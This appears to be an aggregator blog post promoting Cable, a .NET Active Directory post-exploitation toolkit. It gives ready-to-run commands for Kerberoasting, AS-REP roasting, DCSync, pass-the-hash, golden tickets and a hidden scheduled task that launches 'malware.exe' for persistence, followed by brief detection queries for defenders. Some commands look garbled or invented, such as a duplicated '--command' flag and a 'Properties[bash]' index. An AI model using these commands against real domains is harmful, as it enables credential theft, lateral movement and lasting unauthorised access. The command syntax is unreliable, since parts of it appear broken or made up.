GitHub – logangoins/Cable: NET Post-Exploitation Toolkit for Active Directory Reconnaissance and Exploitation

By /

Listen to this Post

Cable is a powerful .NET post-exploitation toolkit designed for Active Directory (AD) reconnaissance and exploitation. It provides red teams and penetration testers with advanced capabilities to assess and exploit AD environments effectively.

You Should Know:

1. Key Features of Cable:

  • AD Reconnaissance: Enumerate users, groups, computers, and trust relationships.
  • Exploitation Modules: Execute attacks like Kerberoasting, AS-REP Roasting, and DCSync.
  • Lateral Movement: Facilitate pass-the-hash, pass-the-ticket, and other lateral movement techniques.
  • Persistence Mechanisms: Establish backdoors and maintain access in compromised environments.

2. Installation & Setup:

git clone https://github.com/logangoins/Cable.git 
cd Cable 
dotnet restore 
dotnet build

3. Basic Commands for AD Reconnaissance:

 Enumerate Domain Users 
Cable.exe --command users --domain example.com

Extract SPNs for Kerberoasting 
Cable.exe --command kerberoast --output kerberoast_hashes.txt

Perform DCSync Attack (Requires DA Privileges) 
Cable.exe --command dcsync --user administrator --domain example.com

4. Exploitation Examples:

 AS-REP Roasting Attack 
Cable.exe --command asreproast --users vulnerable_users.txt

Pass-the-Hash Attack 
Cable.exe --command pth --user bob --ntlm aad3b435b51404eeaad3b435b51404ee --target 192.168.1.10

5. Post-Exploitation & Persistence:

 Golden Ticket Attack 
Cable.exe --command golden --krbtgt <hash> --domain example.com --sid S-1-5-21-...

Create a Hidden Scheduled Task for Persistence 
Cable.exe --command schtask --name "UpdateTask" --command "cmd /c C:\malware.exe"

What Undercode Say:

Cable is a formidable tool for offensive security professionals working in AD environments. However, misuse can lead to severe security breaches. Defenders should monitor for abnormal .NET executions, unusual Kerberos ticket requests, and unexpected DCSync activities.

Blue Team Countermeasures:

 Detect Suspicious Kerberos Requests (SIEM Query) 
EventID=4769 AND (TicketOptions=0x40810000 OR TicketEncryption=0x17)

Hunt for DCSync Attacks 
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4662} | Where-Object {$_.Properties[bash].Value -eq "DS-Replication-Get-Changes"}

Block Pass-the-Hash with LSA Protection (Windows) 
reg add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 1 /f

Expected Output:

A detailed report of AD enumeration, exploitation logs, and extracted credential hashes for further analysis.

Reference:

References:

Reported By: Florian Hansemann – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Related Posts: